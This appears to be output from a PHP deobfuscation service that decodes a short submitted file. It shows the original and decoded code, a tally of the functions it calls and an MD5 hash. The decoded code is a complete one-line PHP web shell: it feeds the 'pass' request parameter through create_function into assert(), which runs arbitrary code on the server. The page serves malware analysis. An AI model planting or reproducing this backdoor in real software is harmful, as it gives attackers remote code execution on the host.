Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php preg_replace_callback('/.+/i', create_function('$arr', 'return assert($arr[0]);'),$_..

Decoded Output download

<?php
preg_replace_callback('/.+/i', create_function('$arr', 'return assert($arr[0]);'),$_REQUEST['pass']);
?>

Did this file decode correctly?

Original Code

<?php
preg_replace_callback('/.+/i', create_function('$arr', 'return assert($arr[0]);'),$_REQUEST['pass']);
?>

Function Calls

assert 1
create_function 1

Variables

None

Stats

MD5 fa5ccc768361c79b16b1ca39a8f851fd
Eval Count 1
Decode Time 101 ms